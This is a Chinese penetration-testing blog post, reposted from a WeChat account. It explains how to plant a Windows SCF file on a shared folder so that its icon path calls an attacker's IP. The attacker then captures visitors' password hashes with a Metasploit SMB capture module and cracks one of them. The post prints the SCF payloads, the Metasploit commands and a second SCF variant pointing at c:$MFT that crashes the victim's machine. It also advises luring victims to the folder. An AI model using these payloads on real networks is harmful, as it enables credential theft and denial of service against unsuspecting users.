【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码

  • A+
所属分类:安全文章

【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码


过学习看雪一篇文章对SCF文件利用攻击网络共享文件夹,由于原文有些地方没有提及,于是便尝试了一下复现,个人认为在内网渗透中某些技巧灵活运用起来能事半功倍,多学习一种新方式,就可能多一种新思路

1.        通过创建SCF文件指向攻击者ip
2.        创建共享文件夹放入SCF文件并设置权限为公共访问
3.        浏览或上传文件到目标系统成功获取到用户系统HASH

通过创建SCF文件,修改其中地址为攻击者ip

[Shell]

Command=2

IconFile=\192.168.1.214sharetest.ico

[Taskbar]

Command=ToggleDesktop

【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码

【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码


创建共享文件夹并设置权限


【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码

【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码


监听smb服务
use auxiliary/server/capture/smb
设置HASH密码保存地址
set JOHNPWFILE xxxxx

通过浏览文件夹成功获取到用户系统密码


【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码

【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码


得到访问者电脑系统密码
第一列为用户密码,第二列为系统用户登录名
由此成功破解密码为aasron


提示:
1.攻击目标死机SCF文件,根据原文解释无需攻击者或被攻击者操作

[Shell]

Command=2

IconFile= c:$MFT123

[Taskbar]

Command=ToggleDesktop

2.如果指定攻击某台系统需要对方开启写入权限并写入文件、否则则要使用本机上传SCF文件并诱使被攻击者访问


【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码



本文始发于微信公众号(T00ls):【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: